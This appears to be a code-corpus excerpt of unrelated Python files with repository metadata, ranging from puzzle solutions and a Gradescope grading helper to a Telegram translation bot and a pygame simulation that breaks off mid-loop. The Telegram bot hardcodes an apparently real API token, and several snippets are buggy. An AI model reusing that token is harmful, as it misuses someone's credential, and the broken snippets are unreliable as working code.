89476f0f239892b8bbefab6381c3b65491d980ba | Python | 2heeesss/Problem_Solving | /reBOJ/9935.py | UTF-8 | 345 | 3.09375 | 3 | [] | no_license | import sys
input = sys.stdin.readline
word = input().rstrip()
bomb = input().rstrip()
lastChar = bomb[-1]
stk = []
lw, lb = len(word), len(bomb)
for i in word:
stk.append(i)
if i == lastChar and ('').join(stk[-lb:]) == bomb:
for _ in range(lb):
stk.pop()
if stk:
print(('').join(stk))
else:
print('FRULA')
| true |
4832bad191dc78608c42f48f9afdd23118a1f004 | Python | Aasthaengg/IBMdataset | /Python_codes/p02898/s095702683.py | UTF-8 | 92 | 2.5625 | 3 | [] | no_license | n,k=map(int,input().split());print(len([i for i in list(map(int,input().split())) if i>=k])) | true |
cd3c186bc99bf1723b3229bb69cc2d7237dab4e0 | Python | MartinsJunior/EstAcqua | /NodeABP/myfuncs.py | UTF-8 | 770 | 2.9375 | 3 | [] | no_license | /*
Funcao criada para ler a voltagem no divisor de tensao (na placa desenvolvida para o projeto - visualizar pasta Projeto)
Retorna a voltagem da bateria
*/
from machine import ADC
# myADC
# ADC 12 bits
# Conversao para mV
# Retorna o valor da tensao da bateria em mV
# Divisor de tensao: R1=680k, R2=100k
# ADC Pino 16, (input only; max voltage 1.1V)
def get_batt_mV():
numADCreadings = const(100)
adc = ADC(0)
adcread = adc.channel(pin='P16')
samplesADC = [0.0]*numADCreadings; meanADC = 0.0
i = 0
while (i < numADCreadings):
adcint = adcread()
samplesADC[i] = adcint
meanADC += adcint
i += 1
meanADC /= numADCreadings
mV = ((meanADC*1100/4096)*(680+100)/100)
mV_int = int(mV)
return mV_int
| true |
8a2bf18cbb7fe889a73d882f485df7c79da22779 | Python | leehj8896/PS | /문제풀이/자릿수 더하기/main.py | UTF-8 | 148 | 3.25 | 3 | [] | no_license | def solution(n):
answer = 0
while True:
answer+=n%10
n=n//10
if n==0:
break
return answer | true |
fd1efd93b60f7fb74d1cd0080cb915e92f4c3444 | Python | jacksonyoudi/AlgorithmCode | /PyProject/leetcode/history/n-ary-tree-preorder-traversal.py | UTF-8 | 396 | 3.390625 | 3 | [] | no_license | from typing import List
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children
class NAryTreePreorderTraversal:
def preorder(self, root: 'Node') -> List[int]:
res = []
if root:
res.append(root.val)
for i in root.children:
res.extend(self.preorder(i))
return res
| true |
d1f7e46b3cec3c134ce391e10bd8333157ae81a8 | Python | pythonzhangfeilong/Python_WorkSpace | /8_Demo_Datas/1_Demo_Broken/Demo2/用户登陆.py | UTF-8 | 256 | 3.453125 | 3 | [] | no_license | while True:
username='zhang'
password='123'
a=input('请输入用户名')
b=input('请输入密码')
if username==a and password==b:
print('欢迎登陆')
else:
print('登陆失败,请核对账号密码后重试')
| true |
a48e96f1bba48c39d7d11e84116f399da8feca77 | Python | davidwederstrandtsr/ds-methodologies-exercises | /time_series/acquire.py | UTF-8 | 2,643 | 2.984375 | 3 | [] | no_license | import numpy as np
import pandas as pd
import requests
from os import path
# acquires the data from a url and the end point
def acquire_data(base_url, url_end):
'''
Returns a dataframe after acquiring json data from a url
base_url: the main url of the website being accessed
url_end: the targeted web page url name
'''
df = pd.DataFrame([])
response = requests.get(base_url + f'/api/v1/{url_end}')
data = response.json()
for i in range(1, data['payload']['max_page']+1):
response = requests.get(base_url + f'/api/v1/{url_end}?page={i}')
data = response.json()
i_list = data['payload'][url_end]
# df = df.append(i_list)
df = df.extend(i_list)
return df
#
def check_csv(base_url='', url_end=''):
'''
Returns a dataframe
path.exists checks to see if the csv exists in the local storage
- if the file is there:
-reads the csv to a dataframe
- if the file does not exist:
- calls acquire_data()
- writes csv files to local storage
- reads csv to dataframe
'''
if path.exists(f'{url_end}.cvs'):
df =pd.read_csv(f'{url_end}.cvs', index_col=0)
else:
df = acquire_data(base_url, url_end)
df.to_csv(f'{url_end}.cvs')
df =pd.read_csv(f'{url_end}.cvs', index_col=0)
return df
def merge_sales(base_url, url1='', url2='', url3=''):
'''
Returns merged dataframe
- calls check_csv():
- datframes return:
- items
- stores
- sales
- merges sales and items dataframe:
- the whole sales dataframe is eccientally copied to new dataframe
- where sales.item and items.item_id match:
- that items row is populated on the sales.item row
* note: this is actually done on df not sales ~ sales is not changed
- the same is performed on stores but with the new dataframe
- new dataframe, we drop rows to prevent duplicates:
- store
- item
'''
items = check_csv(base_url, url1)
stores = check_csv(base_url, url2)
sales = check_csv(base_url, url3)
df = sales.merge(items, left_on='item', right_on='item_id')
df = df.merge(stores, left_on='store', right_on='store_id')
df.drop(columns=(['store', 'item']), inplace=True)
df.to_csv('time_sales.csv')
return pd.read_csv('time_sales.csv', index_col=0)
def get_url_data(url):
df = pd.read_csv(f'{url}')
df.to_csv('german_power.csv')
return pd.read_csv('german_power.csv', index_col=0)
| true |
46a610ea2349eeeeab834c75fa3650513fe77a49 | Python | stegua/dotlib | /python/rnd_matrix.py | UTF-8 | 2,640 | 3.09375 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 7 15:07:22 2017
@author: gualandi
"""
import numpy as np
import networkx as nx
from time import time
from gurobipy import Model, GRB, quicksum
def SolveCuttingPlane(h1, h2, M):
m = Model()
m.setParam(GRB.Param.TimeLimit, 300)
m.setParam(GRB.Param.Method, 1)
# Create variables
x = {}
n = len(h1)
for i in range(n):
for j in range(n):
x[i,j] = m.addVar(obj=M[i][j], name='x'+str(i)+'_'+str(j))
m.update()
for i in range(n):
m.addConstr(quicksum(x[i,j] for j in range(n)) == h1[i])
for j in range(n):
m.addConstr(quicksum(x[i,j] for i in range(n)) == h2[j])
# Solve the model
m.optimize()
return m.getAttr(GRB.Attr.ObjVal)
def Wasserstein(h1, h2, M):
""" Compute the Wasserstein distance between the two histograms
h1 and h2 using distance matrix M """
d = len(h1)
# Build the graph for max flow
G = nx.DiGraph()
# add d nodes for each histrogam
# (d+1) source, (d+2) target
for i in range(d):
G.add_node(i, demand=-h1[i])
G.add_node(d+i, demand=+h2[i])
# Add all edges
for i in range(d):
for j in range(d):
G.add_edge(i, d+j, weight=M[i][j], capacity=min(h1[i], h2[j]))
#flowCost, flowDict = nx.capacity_scaling(G, heap=nx.utils.heaps.PairingHeap)
flowCost, flowDict = nx.capacity_scaling(G, heap=nx.utils.heaps.BinaryHeap)
#flowCost, flowDict = nx.network_simplex(G)
return flowCost
def MakeHistogram(d):
""" Make a normalized random histogram on the simplex """
hist = np.random.permutation(range(d))
hist = [np.random.uniform(0,1) for _ in range(d)]
hsum = sum(hist)
hist = [h/hsum for h in hist]
return hist
def MakeCostMatrix(d):
""" Make a ransom metrix matrix as described in Cuturi 2013 (Figure 4) """
G = nx.erdos_renyi_graph(d, 0.5)
for u,v,w in G.edges(data=True):
w['weight'] = np.random.uniform(0,1)
# All pair shortest path
M = nx.floyd_warshall(G)
return M
#------------------------------------------
# MAIN ENTRY POINT
#------------------------------------------
if __name__ == "__main__":
start = time()
# Random graph as in
d = 512
M = MakeCostMatrix(d)
print("Build matrix time: ", time()-start)
# Create two random histograms of dimension d
h1 = MakeHistogram(d)
h2 = MakeHistogram(d)
print(SolveCuttingPlane(h1, h2, M))
print("Gurobi time: ", time()-start)
#print(Wasserstein(h1, h2, M))
#print("Total time: ", time()-start)
| true |
e9f9feb046fe591c2b47d06df13d9559c01c28c3 | Python | sheriline/python | /voting-app-with-testing/backend/voting_app/irv.py | UTF-8 | 1,358 | 3.328125 | 3 | [] | no_license | def check(data):
eq = {
"position": data[0]["position"],
"candidates": [],
} # Store the candidates with the same percentage but less then 50%
# determine winner
_max = max(data, key=lambda x: x["percent"])
if _max["percent"] > 50:
return _max
loser = min(data, key=lambda x: x["percent"])
if loser["percent"] == _max["percent"]:
for cand in data:
if cand["percent"] == _max["percent"]:
eq["candidates"].append(cand)
return eq
else:
for (idx, dd) in enumerate(data):
if dd["id"] == loser["id"]:
try:
i = idx + 1
data[i]["percent"] = data[i]["percent"] + data[idx]["percent"]
del data[idx]
except IndexError:
i = idx - 1
data[i]["percent"] = data[i]["percent"] + data[idx]["percent"]
del data[idx]
# condition if the total is not equal to 100
if len(data) == 2:
if sum(d["percent"] for d in data) < 100:
min(data, key=lambda x: x["percent"])["percent"] = 50
while _max["percent"] <= 50:
try:
a = check(data)
except Exception:
pass
else:
if a:
return a
break
| true |
6a10bd4052d6e35ceec9eb4d597becd3aef2ae8b | Python | rimjhiim8/GitHub_Tutorial_111 | /Data_Types.py/while_loop.py/for.py/Function.py/arguments.py | UTF-8 | 280 | 4.125 | 4 | [] | no_license | # function with one argument (fname). When the function
# is called, we pass along a first name,
# which is used inside the function to print the full name:
def my_function(fname):
print(fname + "Hello")
my_function("Rimjhiim")
my_function("Sehgal")
my_function("Kakar") | true |
489d213263a45d296cad93b031413197b8dd2b45 | Python | stevenbell/gradescope-utils | /gradescope_utils/autograder_utils/ee200utils.py | UTF-8 | 5,471 | 2.734375 | 3 | [] | no_license | import re
import subprocess as sp
import signal
import os.path
# Small functions that get used repeatedly in creating and running tests
# on student C/C++ code.
def test_build(test, target, wdir, makefile='test_makefile', maketarget=None):
""" Try building `target` in `wdir` using a `makefile` and send
any output to the console. Fail `test` if there is a problem.
"""
# If the user didn't specify a separate makefile target, then just use the
# name of the output file. This is the normal case, except for phony targets.
if maketarget is None:
maketarget = target
# If the target already exists, remove it
# Simpler to put this here than require every makefile to have a `clean` command
if os.path.isfile(wdir + target):
os.remove(wdir + target)
print("Removing submitted binary...")
try:
log = sp.check_output(["make", "-f", wdir + makefile, "--silent", "--always-make", "-C", wdir, maketarget], stderr = sp.STDOUT)
except sp.CalledProcessError as e:
test.fail("Failed to compile. Output is: {}".format(e.output.decode('utf-8')))
if len(log.strip()) > 0:
print("g++ output:\n{}".format(log.decode('utf-8')))
# check that the output exists
val = os.path.isfile(wdir + target)
test.assertTrue(val, "Make/gcc/g++ didn't produce a binary")
# Otherwise, we're all good
print('Compiled successfully!')
def test_coverage(test, source, target, wdir, makefile='test_makefile'):
""" Runs gcov (generally on the student's test code) and fails the test if
there is less than 100% coverage on the file under test. """
try:
log = sp.check_output(["make", "-f", wdir + makefile, "CFLAGS=-O0 --coverage", "--silent", "--always-make", "-C", wdir, target], stderr = sp.STDOUT)
except sp.CalledProcessError as e:
test.fail("Failed to compile for test coverage. Output is: {}".format(e.output.decode('utf-8')))
safe_run(test, [wdir + target], cwd=wdir)
# Somewhere around gcc 11, the naming of the gcov output files changed. As of gcc 11,
# `gcc source1.c source2.c -o binary` generates files like binary-source1.gcda
# See https://gcc.gnu.org/onlinedocs/gcc/Instrumentation-Options.html
gcov_name = f"{target}-{source}"
result = harness_run(test, ["gcov", "-n", gcov_name], cwd=wdir)
pctmatch = re.search('\d+\.?\d+\%', result)
if pctmatch.group() != "100.00%":
test.fail("Test coverage is only " + pctmatch.group())
print("Test coverage is 100%!\n(Remember, this doesn't mean your code is correct, or that you're testing everything you should. It does mean that your tests exercise every path through your program.)")
def run_valgrind(test, command, **kwargs):
if not type(command) is list:
command = [command]
try:
log = sp.check_output(["valgrind", "--tool=memcheck", "--leak-check=yes", "--error-exitcode=4"] + command, stderr = sp.STDOUT, **kwargs)
except sp.CalledProcessError as e:
test.fail("Valgrind reported errors:\n {}".format(e.output.decode('utf-8')))
print("Valgrind clean!")
def safe_run(test, command, timeout=5, **kwargs):
""" Wrapper around check_output which fails the test if the code segfaults or
takes too long. A brief informative message is logged with the failure."""
try:
result = sp.check_output(command, timeout=timeout, **kwargs)
except sp.CalledProcessError as e:
if e.returncode == -signal.SIGSEGV:
test.fail("Program segfaulted")
elif e.returncode == -signal.SIGABRT:
test.fail("Program was aborted (assert failed or memory was corrupted)")
else:
# We don't know what students will return from main, so assume
# anything other than a segfault/abort is ok.
result = e.output
except sp.TimeoutExpired as e:
test.fail("Program timed out after {} seconds".format(timeout))
return result.decode('utf-8')
def harness_run(test, command, timeout=5, **kwargs):
"""Equivalent to safe_run, except that it prints different error messages.
This function should be used for test harness operations, while safe_run
should be used any time we're calling student code."""
try:
result = sp.check_output(command, timeout=timeout, **kwargs)
except sp.CalledProcessError as e:
if e.returncode == -signal.SIGSEGV:
test.fail("Test harness segfaulted - check with teaching staff")
else:
test.fail("Test harness call failed - check with teaching staff")
except sp.TimeoutExpired as e:
test.fail("Test harness timed out - check with teaching staff")
return result.decode('utf-8')
def findString(haystack):
matches = re.findall('###(?:.|\s)*?###', haystack) # (?: non-capturing, *? non-greedy
# There should be exactly one match, or we're hosed
if len(matches) != 1:
return None
# Strip off the ###
return matches[0][3:-3]
def findInteger(haystack):
matches = re.findall('###[+-]?\d+###', haystack)
# There should be exactly one match, or we're hosed
if len(matches) != 1:
return None
# Strip off the ### and convert to an integer
return int(matches[0][3:-3])
def findDouble(haystack):
matches = re.findall('###[+-]?\d+\.\d+###', haystack)
# There should be exactly one match, or we're hosed
if len(matches) != 1:
return None
# Strip off the ### and convert to an integer
return float(matches[0][3:-3])
| true |
f969073787e49c3e70d5afe34eed6f0c8037be10 | Python | maughray/Telegram-Translator-Bot | /main.py | UTF-8 | 1,939 | 2.5625 | 3 | [] | no_license | from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from google_trans_new import google_translator
import logging
TELEGRAM_TOKEN = '1787783787:AAHw8Nw4aieDmt0Dub7oiEjCgCkFIvmzXvA'
TARGET_LANGUAGE_KEY = 'target_language'
translator = google_translator()
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
def start(update, context):
update.message.reply_text('EZ Translator - Free, unlimited translation\nSet target language: /set_language [CODE]\nWrite any message and I will translate it.')
def help(update, context):
update.message.reply_text('Set target language:\n/set_language [CODE] - Setting target language\nWrite any message and I will translate it.')
def translate(update, context):
if TARGET_LANGUAGE_KEY in context.user_data.keys():
target_language = context.user_data[TARGET_LANGUAGE_KEY]
result = translator.translate(update.message.text, lang_tgt=target_language)
update.message.reply_text(result)
else:
update.message.reply_text('You must specify target language!')
def set_language(update, context):
language = update.message.text.split()[1]
context.user_data[TARGET_LANGUAGE_KEY] = language # TODO: validate language
update.message.reply_text('Language set: ' + language)
def error(update, context):
update.message.reply_text('Something went wrong!')
logger.warning('Update "%s" caused error "%s"', update, context.error)
def main():
updater = Updater(TELEGRAM_TOKEN, use_context=True)
dp = updater.dispatcher
dp.add_handler(CommandHandler("start", start))
dp.add_handler(CommandHandler("help", help))
dp.add_handler(CommandHandler("set_language", set_language))
dp.add_handler(MessageHandler(Filters.text, translate))
dp.add_error_handler(error)
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main() | true |
b348873950571a97ca4b956b29ea108bb68056d5 | Python | ehdgua01/Algorithms | /coding_test/programmers/stack_queue/top/solution.py | UTF-8 | 462 | 3.046875 | 3 | [] | no_license | """
프로그래머스 알고리즘 문제
https://programmers.co.kr/learn/courses/30/lessons/42588
"""
def solution(heights: list) -> list:
answer: list = []
heights.reverse()
for idx, height in enumerate(heights, start=1):
receiver = 0
for i, h in enumerate(heights[idx:]):
if h > height:
receiver = len(heights) - i - idx
break
answer.insert(0, receiver)
return answer
| true |
3b2150825c381b2e21d787059d18d4e2ad07fd23 | Python | benkiel/python_workshops | /2019_3_Cooper_Type/RoboFont/convert_to_hex.py | UTF-8 | 150 | 2.65625 | 3 | [
"MIT"
] | permissive | glyph = CurrentGlyph()
# glyph.appendAnchor("top", (300,300))
print(glyph.unicodes)
for u in glyph.unicodes:
print('0x{:02x}'.format(integer)) | true |
425da8ff0e53af6a51eb897d9f8b417e67c550e6 | Python | sunqf/data-tools | /corpus/bicorpus/bing/vocab.py | UTF-8 | 685 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
import asyncio
import asyncpg
import re
from corpus.bicorpus import db
_sep = re.compile('[;,:,/ ]')
async def build():
terms = set()
db_conn = await db.connect()
async with db_conn.transaction():
records = await db_conn.fetch('SELECT ch, en from dictall_term')
for record in records:
chs = _sep.split(record['ch'])
ens = _sep.split(record['en'])
terms.update(chs)
terms.update(ens)
terms.add(record['en'])
for term in terms:
print(term)
loop = asyncio.get_event_loop()
loop.run_until_complete(build())
loop.close()
| true |
38cdb2f62cd8523d745c822789402b6f73198782 | Python | makwanas/Deep-Co-clustering-improvisations | /ConvDeepCC/ConvDeepCC/Code/core/general/pretrain_conv_autoencoder.py | UTF-8 | 10,706 | 2.625 | 3 | [
"MIT"
] | permissive | import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import math
# ---------------------------------
mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
n_classes = 10
batch_size = 100
# tf Graph Input
# mnist data image of shape 28*28=784
x = tf.placeholder(tf.float32, [None, 1024], name='InputData')
# 0-9 digits recognition => 10 classes
y = tf.placeholder(tf.float32, [None, 10], name='LabelData')
# This is
logs_path = "./logs/"
# ---------------------------------
"""
We start by creating the layers with name scopes so that the graph in
the tensorboard looks meaningful
"""
# ---------------------------------
def conv2d(input, name, kshape, strides=[1, 1, 1, 1]):
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
W = tf.get_variable(name='w_'+name,
shape=kshape,
initializer=tf.contrib.layers.xavier_initializer(uniform=False))
b = tf.get_variable(name='b_' + name,
shape=[kshape[3]],
initializer=tf.contrib.layers.xavier_initializer(uniform=False))
out = tf.nn.conv2d(input, W, strides=strides, padding='SAME')
out = tf.nn.bias_add(out, b)
out = tf.nn.relu(out)
return out
# ---------------------------------
def deconv2d(input, name, kshape, n_outputs, strides=[1, 1]):
with tf.name_scope(name):
out = tf.contrib.layers.conv2d_transpose(input,
num_outputs=n_outputs,
kernel_size=kshape,
stride=strides,
padding='SAME',
weights_initializer=tf.contrib.layers.xavier_initializer_conv2d(
uniform=False),
biases_initializer=tf.contrib.layers.xavier_initializer(
uniform=False),
activation_fn=tf.nn.relu)
return out
# ---------------------------------
def maxpool2d(x, name, kshape=[1, 2, 2, 1], strides=[1, 2, 2, 1]):
with tf.name_scope(name):
out = tf.nn.max_pool(x,
ksize=kshape, # size of window
strides=strides,
padding='SAME')
return out
# ---------------------------------
def upsample(input, name, factor=[2, 2]):
size = [int(input.shape[1] * factor[0]), int(input.shape[2] * factor[1])]
with tf.name_scope(name):
out = tf.image.resize_bilinear(
input, size=size, align_corners=None, name=None)
return out
# ---------------------------------
def fullyConnected(input, name, output_size):
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
input_size = input.shape[1:]
input_size = int(np.prod(input_size))
W = tf.get_variable(name='w_'+name,
shape=[input_size, output_size],
initializer=tf.contrib.layers.xavier_initializer(uniform=False))
b = tf.get_variable(name='b_'+name,
shape=[output_size],
initializer=tf.contrib.layers.xavier_initializer(uniform=False))
input = tf.reshape(input, [-1, input_size])
out = tf.nn.relu(tf.add(tf.matmul(input, W), b))
return out
# ---------------------------------
def dropout(input, name, keep_rate):
with tf.name_scope(name):
out = tf.nn.dropout(input, keep_rate)
return out
# ---------------------------------
# Let us now design the autoencoder
class PretrainAutoencoder:
def __init__(self, config, num_drop_out):
self.num_dim = config
self.code_layer = len(config)
self.num_dropout_layer = num_drop_out
def run(self, x, keep_prob):
img_size = int(math.sqrt(self.num_dim[0]))
print("img_size:", img_size)
input = None
output = []
fc2 = []
print("input size:", x.shape)
if img_size**2 != self.num_dim[0]:
input = tf.reshape(x, shape=[-1, 15, 11, 1])
# encoding part
c1 = conv2d(input, name='c1', kshape=[5, 5, 1, 25])
p1 = maxpool2d(c1, name='p1')
do1 = dropout(p1, name='do1', keep_rate=0.9)
do1 = tf.reshape(do1, shape=[-1,8*6*25])
fc1 = fullyConnected(do1, name='fc1-2',output_size=8*6*5)
do2 = dropout(fc1, name='do2-2',keep_rate=0.9)
fc2 = fullyConnected(do2,name='fc2-2',output_size=8*6)
# Decoding part
fc3 = fullyConnected(fc2, name='fc3-2', output_size=8*6*5)
do3 = dropout(fc3, name='do3-2', keep_rate=0.9)
fc4 = fullyConnected(do3, name='fc4-2', output_size=8*6*25)
do4 = dropout(fc4, name='do3-2', keep_rate=0.9)
do4 = tf.reshape(do4, shape=[-1, 8, 6, 25])
dc1 = deconv2d(do4, name='dc1-2', kshape=[5, 5], n_outputs=25)
up1 = upsample(dc1, name='up1-2', factor=[2, 2])
output = fullyConnected(up1, name='output-2', output_size=15*11)
print("output shape:", output.shape)
print("fc2 shape:", fc2.shape)
#output = tf.reshape(output, shape=[15,11])
#fc2 = tf.reshape(output, shape=[512,83])
else:
input = tf.reshape(x, shape=[-1, img_size, img_size, 1])
# encoding part
c1 = conv2d(input, name='c1', kshape=[5, 5, 1, 25])
p1 = maxpool2d(c1, name='p1')
do1 = dropout(p1, name='do1', keep_rate=0.9)
do1 = tf.reshape(do1, shape=[-1, (img_size//2)*(img_size//2)*25])
fc1 = fullyConnected(do1, name='fc1', output_size=(
img_size//2)*(img_size//2)*5)
do2 = dropout(fc1, name='do2', keep_rate=0.9)
fc2 = fullyConnected(
do2, name='fc2', output_size=48)
# Decoding part
fc3 = fullyConnected(
fc2, name='fc3', output_size=(img_size//2) * (img_size//2) * 5)
do3 = dropout(fc3, name='do3', keep_rate=0.9)
fc4 = fullyConnected(
do3, name='fc4', output_size=(img_size//2) * (img_size//2) * 25)
do4 = dropout(fc4, name='do3', keep_rate=0.9)
do4 = tf.reshape(do4, shape=[-1, (img_size//2), (img_size//2), 25])
dc1 = deconv2d(do4, name='dc1', kshape=[5, 5], n_outputs=25)
up1 = upsample(dc1, name='up1', factor=[2, 2])
output = fullyConnected(up1, name='output', output_size=img_size*img_size)
print("output shape:", output.shape)
print("fc2 shape:", fc2.shape)
with tf.name_scope('cost'):
cost = tf.reduce_mean(tf.square(tf.subtract(output, x)))
return fc2, [cost], [[c1, output]], tf.nn.l2_loss(0.0), [0]
def ConvAutoEncoder(x, name):
with tf.name_scope(name):
"""
We want to get dimensionality reduction of 784 to 196
Layers:
input --> 28, 28 (784)
conv1 --> kernel size: (5,5), n_filters:25 ???make it small so that it runs fast
pool1 --> 14, 14, 25
dropout1 --> keeprate 0.8
reshape --> 14*14*25
FC1 --> 14*14*25, 14*14*5
dropout2 --> keeprate 0.8
FC2 --> 14*14*5, 196 --> output is the encoder vars
FC3 --> 196, 14*14*5
dropout3 --> keeprate 0.8
FC4 --> 14*14*5,14*14*25
dropout4 --> keeprate 0.8
reshape --> 14, 14, 25
deconv1 --> kernel size:(5,5,25), n_filters: 25
upsample1 --> 28, 28, 25
FullyConnected (outputlayer) --> 28* 28* 25, 28 * 28
reshape --> 28*28
"""
input = tf.reshape(x, shape=[-1, 28, 28, 1])
# coding part
c1 = conv2d(input, name='c1', kshape=[5, 5, 1, 25])
p1 = maxpool2d(c1, name='p1')
do1 = dropout(p1, name='do1', keep_rate=0.75)
do1 = tf.reshape(do1, shape=[-1, 14*14*25])
fc1 = fullyConnected(do1, name='fc1', output_size=14*14*5)
do2 = dropout(fc1, name='do2', keep_rate=0.75)
fc2 = fullyConnected(do2, name='fc2', output_size=14*14)
# Decoding part
fc3 = fullyConnected(fc2, name='fc3', output_size=14 * 14 * 5)
do3 = dropout(fc3, name='do3', keep_rate=0.75)
fc4 = fullyConnected(do3, name='fc4', output_size=14 * 14 * 25)
do4 = dropout(fc4, name='do3', keep_rate=0.75)
do4 = tf.reshape(do4, shape=[-1, 14, 14, 25])
dc1 = deconv2d(do4, name='dc1', kshape=[5, 5], n_outputs=25)
up1 = upsample(dc1, name='up1', factor=[2, 2])
output = fullyConnected(up1, name='output', output_size=28*28)
with tf.name_scope('cost'):
cost = tf.reduce_mean(tf.square(tf.subtract(output, x)))
return output, cost
# ---------------------------------
def train_network(x):
prediction, cost = ConvAutoEncoder(x, 'ConvAutoEnc')
with tf.name_scope('opt'):
optimizer = tf.train.AdamOptimizer().minimize(cost)
# Create a summary to monitor cost tensor
tf.summary.scalar("cost", cost)
# Merge all summaries into a single op
merged_summary_op = tf.summary.merge_all()
n_epochs = 5
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# create log writer object
writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph())
for epoch in range(n_epochs):
avg_cost = 0
n_batches = int(mnist.train.num_examples / batch_size)
# Loop over all batches
for i in range(n_batches):
batch_x, batch_y = mnist.train.next_batch(batch_size)
# Run optimization op (backprop) and cost op (to get loss value)
_, c, summary = sess.run([optimizer, cost, merged_summary_op], feed_dict={
x: batch_x, y: batch_y})
# Compute average loss
avg_cost += c / n_batches
# write log
writer.add_summary(summary, epoch * n_batches + i)
# Display logs per epoch step
print('Epoch', epoch+1, ' / ', n_epochs, 'cost:', avg_cost)
print('Optimization Finished')
print('Cost:', cost.eval({x: mnist.test.images}))
#train_network(x)
| true |
ef2164c57fbde17ced7e6191a507b8db0e67d8d0 | Python | bishwanathdas2502/efficient_janitor | /efficient_janitor.py | UTF-8 | 1,325 | 3.171875 | 3 | [] | no_license | import math
def janitor(trash):
# print(list(set(map(lambda x:x>=1.5,trash))))
if len(set(trash)) == 1 and trash[0] == 1.5:
return math.ceil(len(trash)/2)
elif list(set(map(lambda x:x>=1.5,trash))) == [True]:
return len(trash)
else:
trash.sort(reverse = True)
less = list(filter(lambda x:x<1.5,trash))
more = list(filter(lambda x:x>=1.5,trash))
# print(less,more)
count = len(more)
while(len(less) and len(more)):
num1 = more.pop(0)
temp = [num1]
for j in less:
if j + sum(temp) <= 3.0:
temp.append(j)
# print(temp)
less.pop(less.index(j))
# print(count)
# print(less)
if len(less) != 0:
# print('yes')
count3 = 0
sum_ = 0
for i in range(len(less)):
# print(sum_)
sum_ += less[i]
if sum_ > 3.0:
count3 += 1
sum_ = less[i]
if sum_ < 3.0:
count3 += 1
count += count3
# print(count)
return count
trash = []
n = int(input())
for i in range(n):
trash.append(float(input()))
x = janitor(trash)
print('%d' % x)
| true |
23fc1b524c27127966dee6e030605876a29b48b3 | Python | syedmeesamali/Python | /4_Misc/1_Block-Chain/hashing.py | UTF-8 | 234 | 3.3125 | 3 | [] | no_license | from hashlib import sha256
# Toy proof-of-work: x is fixed at 7; search for the smallest y such that
# the SHA-256 hex digest of str(x * y) ends in a single "0".
x = 7
y = 0  # candidate answer, incremented until the digest condition holds
while not sha256(f'{x * y}'.encode()).hexdigest().endswith("0"):
    y += 1
print(f'The solution is y = {y}')
| true |
90933c253601fd72c737d8980c65f71750197f98 | Python | aashishpeepra/lifeform-simulation-python | /parsciro.py | UTF-8 | 3,952 | 3.09375 | 3 | [] | no_license | import random
import time
from lifeform import Lifeform
import pygame
import sys
class Parsciro():
    """Artificial-life world: spawns, moves, collides and renders Lifeforms.

    Manages a population of ``Lifeform`` instances of three species
    (1 = red, 2 = green, 3 = blue), resolves same-cell collisions
    (same-species collisions reproduce), culls lifeforms whose energy
    reaches zero, and draws every survivor with pygame each frame.
    """

    def __init__(self, initial, red, green, blue, energy):
        """Create the world and open the pygame window.

        :param initial: number of lifeforms of EACH species spawned at start.
        :param red: movement parameter for species 1 (passed to Lifeform).
        :param green: movement parameter for species 2.
        :param blue: movement parameter for species 3.
        :param energy: starting energy for every lifeform.
        """
        self.allLife = []  # every live Lifeform currently in the world
        self.ROUNDS = initial
        self.INFO = {1: red, 2: green, 3: blue}  # species id -> movement parameter
        self.ENERGY = energy
        pygame.init()  # starts pygame
        self.SCREENSIZE = (1000, 1000)  # height, width of the window
        self.SCREEN = pygame.display.set_mode(self.SCREENSIZE)

    def initialize_life(self):
        """Spawn ``self.ROUNDS`` lifeforms of each species at random positions."""
        for i in range(self.ROUNDS):
            firstForm = Lifeform(1, self.INFO[1], self.ENERGY)
            secondForm = Lifeform(2, self.INFO[2], self.ENERGY)
            thirdForm = Lifeform(3, self.INFO[3], self.ENERGY)
            firstForm.set_random_coords()
            secondForm.set_random_coords()
            thirdForm.set_random_coords()
            self.allLife.append(firstForm)
            self.allLife.append(secondForm)
            self.allLife.append(thirdForm)
            print(firstForm)

    def check_collision(self):
        """Resolve same-cell collisions between lifeforms.

        Two lifeforms standing on identical coordinates interact via
        ``perform_collision``; when both belong to the same species a new
        lifeform of that species is spawned at a random position.  Only
        the first later duplicate of each coordinate is paired per frame.
        """
        coordinates = [each.get_coords() for each in self.allLife]
        i = 0
        length = len(coordinates)
        while i < length:
            if coordinates[i] in coordinates[i + 1:]:
                # Absolute index of the first other lifeform sharing this cell.
                index = coordinates[i + 1:].index(coordinates[i]) + i + 1
                self.allLife[i].perform_collision(self.allLife[index])
                if self.allLife[i].get_type() == self.allLife[index].get_type():
                    # Same species collided: reproduce.
                    newLife = Lifeform(self.allLife[i].get_type(),
                                       self.INFO[self.allLife[i].get_type()],
                                       self.ENERGY)
                    newLife.set_random_coords()
                    self.allLife.append(newLife)
                    coordinates.append(newLife.get_coords())
                    length += 1
                    print("NEW LIFe")
            i += 1

    def update_life(self):
        """Advance and redraw every lifeform; cull those out of energy."""
        # Background color reset to white each frame.
        self.SCREEN.fill((255, 255, 255))
        # Iterate over a snapshot: removing from self.allLife while looping
        # over it directly would skip the element after each removal.
        for each in list(self.allLife):
            if each.get_energy() <= 0:
                print(" --->Removed", each)
                self.allLife.remove(each)
                continue
            each.move()
            pygame.draw.circle(self.SCREEN, each.get_color(), each.get_coords(), 5)
            print(each)
        pygame.display.update()
        pygame.display.flip()

    def life_loop(self):
        """Run the main simulation loop until the window is closed.

        On quit, prints a census of surviving lifeforms per species and
        exits the process.
        """
        # Created once, outside the loop: Clock.tick() measures time since
        # the previous tick() on the SAME clock, so a fresh Clock per frame
        # (as before) never actually capped the framerate.
        clock = pygame.time.Clock()
        while True:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    # Final census of survivors per species.
                    counter = {1: 0, 2: 0, 3: 0}
